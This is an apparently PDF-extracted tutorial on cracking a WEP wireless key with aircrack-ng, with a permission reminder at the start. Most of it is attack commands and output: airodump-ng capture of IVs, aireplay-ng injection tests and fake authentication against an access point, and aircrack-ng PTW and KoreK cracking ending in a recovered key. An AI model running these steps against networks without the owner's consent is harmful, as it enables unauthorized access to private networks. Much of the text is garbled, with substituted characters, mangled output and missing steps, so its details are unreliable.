hacking wep with aircrack

8/10/2019 Hacking WEP With Aircrack

1/9

Hacking WEP with Aircrack

This tutorial walks you though a very simple case to crack a WEP key. It is intended to build

your basic skills and get you familiar with the concepts. It assumes you have a working

wireless card with drivers already patched for injection.

It is recommended that you experiment with your home wireless access point to get familiar

with these ideas and techniues. If you do not own a particular access point! please remember

to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the "ircrack#ng teamfor producing such a great robust

tool.

Please send me any constructive feedback! positive or negative. "dditional troubleshooting

ideas and tips are especially welcome.

Assumptions

$irst! this solution assumes%

&ou are using drivers patched for injection.

&ou are physically close enough to send and receive access point packets. 'emember

that just because you can receive packets from the access point does not mean you

may will be able to transmit packets to the "P. The wireless card strength is typically

less then the "P strength. (o you have to be physically close enough for your

transmitted packets to reach and be received by the "P.

There is at least one wired or wireless client connected to the network and they areactive. The reason is that this tutorial depends on receiving at least one "'P reuest

packet and if there are no active clients then there will never be any "'P reuest

packets.

&ou are using v).* of aircrack#ng. If you use a different version then some of the

common options may have to be changed.

Ensure all of the above assumptions are true! otherwise the advice that follows will not work.

In the examples below! you will need to change +ath), to the interface name which is specific

to your wireless card.

Equipment used

In this tutorial! here is what was used%

-" address of P running aircrack#ng suite% ))%)$%/0%11%"%12

/((I3 4-" address of access point5% ))%67%8%9E%7)%1)

E((I3 4Wireless network name5% teddy

"ccess point channel% *

Wireless interface% ath)
http://trac.aircrack-ng.org/wiki/Teamhttp://trac.aircrack-ng.org/wiki/Team


2/9

&ou should gather the euivalent information for the network you will be working on. Then

just change the values in the examples below to the specific network.

Solution

Solution Overview

To crack the WEP key for an access point! we need to gather lots of initiali:ation vectors

4I;s5.


3/9

wifi0 no wireless etensions!

If there are any remaining athA interfaces! then stop each one. When you are finished! run

+iwconfig, to ensure there are none left.

: freuency

which is channel * and the "ccess Point shows the -" address of your wireless card. Please

note that only the madwifi#ng drivers show the -" address of your wireless card! the other

drivers do not do this. (o everything is good. It is important to confirm all this information

prior to proceeding! otherwise the following steps will not work properly.

To match the freuency to the channel! check out%

http%CCwww.rflinx.comChelpCcalculationsCD2.7gh:wifichannelsthen select the +Wifi hannel(election and hannel =verlap, tab. This will give you the freuency for each channel.

Step 2 Test Wireless Device Pacet !n"ection
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channelshttp://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels


4/9

The purpose of this step ensures that your card is within distance of your "P and can inject

packets to it.

Enter%

aireplay-ng -" -e teddy -a 00:':=C:>$:0:%0 ath0

Where%

#* means injection test

#e teddy is the wireless network name

#a ))%67%8%9E%7)%1) is the access point -" address

ath) is the wireless interface name

The system should respond with%

0":&:1 ?aiting for #eacon frame (5ID: 00:':=C:>$:0:%0) on channel "0":&:1 8rying #roadcast pro#e re./ests!!!0":&:1 In@ection is wor+ing0":&:> o/nd ' AP

0":&:> 8rying directed pro#e re./ests!!!0":&:> 00:':=C:>$:0:%0 - channel: " - BteddyB0":&:" Ping (min7avg7ma): '!%&>ms7=%!'1ms7'''!='0ms Power: !>0":&:" 070: '00

The last line is important. Ideally it should say 6))F or a very high percentage. If it is low

then you are too far away from the "P or too close. If it is :ero then injection is not working

and you need to patch your drivers or use different drivers.

Step # Start airodump$n% to capture the !&s

The purpose of this step is to capture the I;s generated. This step starts airodump#ng to

capture the I;s from the specific access point.

=pen another console session to capture the generated I;s. Then enter%

airod/mp-ng -c " --#ssid 00:':=C:>$:0:%0 -w o/tp/t ath0

Where%

#c * is the channel for the wireless network

##bssid ))%67%8%9E%7)%1) is the access point -" address. This eliminate extraneous

traffic.

#w capture is file name prefix for the file which will contain the I;s.

ath) is the interface name.

While the injection is taking place 4later5! the screen will look similar to this%

C3 " E $lapsed: % mins E &00>-0-&' '":&1


5/9

5ID P?6 6F< 5eacons GDataH G7s C3 ,5 $*C CIP3$6A83 $ID

00:':=C:>$:0:%0 & '00 1&0 '>%0> % " 1 ?$P ?$Pteddy

5ID 8A8IJ* P?6 ;ost Pac+ets Pro#es

00:':=C:>$:0:%0 00:0:51:%%:AC:%& & 0 '%>%&

Step ' $ (se airepla)$n% to do a fae authentication with the access point

In order for an access point to accept a packet! the source -" address must already be

associated. If the source -" address you are injecting is not associated then the "P ignores

the packet and sends out a +3e"uthentication, packet in cleartext. In this state! no new I;s

are created because the "P is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails.

'emember the golden rule% The -" you use for injection must be associated with the "P by

either using fake authentication or using a -" from an already#associated client.

To associate with an access point! use fake authentication%

aireplay-ng -' 0 -e teddy -a 00:':=C:>$:0:%0 -h 00:0:51:%%:AC:%& ath0

Where%

#6 means fake authentication

) reassociation timing in seconds

#e teddy is the wireless network name

#a ))%67%8%9E%7)%1) is the access point -" address

#h ))%)$%/0%11%"%12 is our card -" address

ath) is the wireless interface name

(uccess looks like%

'%:'%:&0 ending A/thentication 6e./est'%:'%:&0 A/thentication s/ccessf/l'%:'%:&0 ending Association 6e./est'%:'%:&0 Association s/ccessf/l :-)

=r another variation for picky access points%

aireplay-ng -' =000 -o ' -. '0 -e teddy -a 00:':=C:>$:0:%0 -h00:0:51:%%:AC:%& ath0

Where%

8))) # 'eauthenticate every 8))) seconds. The long period also causes keep alive

packets to be sent.


6/9

#o 6 # (end only one set of packets at a time. 3efault is multiple and this confuses

some "Ps.

# 6) # (end keep alive packets every 6) seconds.

(uccess looks like%

'%:&&:& ending A/thentication 6e./est

'%:&&:& A/thentication s/ccessf/l'%:&&:& ending Association 6e./est'%:&&:& Association s/ccessf/l :-)'%:&&:& ending +eep-alive pac+et'%:&&:1& ending +eep-alive pac+etG and so on!

>ere is an example of what a failed authentication looks like%

%:&%:0& ending A/thentication 6e./est'%:&%:0& A/thentication s/ccessf/l'%:&%:0& ending Association 6e./est'%:&%:0& Association s/ccessf/l :-)'%:&%:0& 2ot a dea/thentication pac+et'%:&%:01 ending A/thentication 6e./est'%:&%:01 A/thentication s/ccessf/l'%:&%:01 ending Association 6e./est'%:&%:'0 ending A/thentication 6e./est'%:&%:'0 A/thentication s/ccessf/l'%:&%:'0 ending Association 6e./est


7/9

owever! decentdepends on a large variety of factors. " typical range is ?)) to 7)) data packets per second. It

can as low as a 6))Csecond and as high as a 0))Csecond.

Trou*leshootin% Tips

If you receive a message similar to +Bot a deauthCdisassoc packet. Is the source mac

associatedL,! this means you have lost association with the "P. "ll your injected

packets will be ignored. &ou must return to the fake authentication step 4(tep ?5 and

successfully associate with the "P.

Step - $ ,un aircrac$n% to o*tain the WEP e)

The purpose of this step is to obtain the WEP key from the I;s gathered in the previous steps.


8/9

(tart another console session and enter%

aircrac+-ng -4 -# 00:':=C:>$:0:%0 o/tp/tM!cap

Where%

#: invokes the PTW WEP#cracking method.

#b ))%67%8%9E%7)%1) selects the one access point we are interested in. This is optionalsince when we originally captured the data! we applied a filter to only capture data for

this one "P.

outputN.cap selects all files starting with +output, and ending in ,.cap,.

To also use the $-(CMoreM method! start another console session and enter%

aircrac+-ng -# 00:':=C:>$:0:%0 o/tp/tM!cap

Where%

#b ))%67%8%9E%7)%1) selects the one access point we are interested in. This is optional

since when we originally captured the data! we applied a filter to only capture data for

this one "P.

outputN.cap selects all files starting with +output, and ending in ,.cap,.

If you are using 6.)#rc6! add the option ,#M, for the $-(CMoreM attack. 46.)#rc6 defaults to

PTW.5

&ou can run this while generating packets. In a short time! the WEP key will be calculated andpresented. &ou will need approximately 20)!))) I;s for 87 bit and 6!0))!))) I;s for 621 bit

keys. If you are using the PTW attack! then you will need about 2)!))) packets for 87#bit and

7)!))) to 10!))) packets for 621 bit. These are very approximate and there are many

variables as to how many I;s you actually need to crack the WEP key.

>ere is what success looks like%

Aircrac+-ng 0!"

E00:0:0= 8ested =>" +eys (got "=='0 IVs)

N5 depth #yte(vote) 0 07 " '&( '1) "( '1) >( '&) >( '&) $( '&) '5( 1)>>( 1) A1( ) =( ) 0( 0) ' 07 % ( =') $%( &>) $0( &) 0=( '%) 5( '=) $( '1)$'( '1) &D( ') %"( '&) $( '&) & 07 & 1=( %>) A=( =) '1( '>) 0&( '1) =5( '1) $0( '1)A5( ') 0$( '0) '>( '0) &>( '0) '7 1 >%( ) 'A( &0) "5( &0) 5( '>) A( '=) &5( '1)D( '1) 1%( '1) =A( '1) >C( '1)

N$L J*D E '&::1=:>%:"0 Pro#a#ility: '00


9/9

hacking wep with aircrack

Documents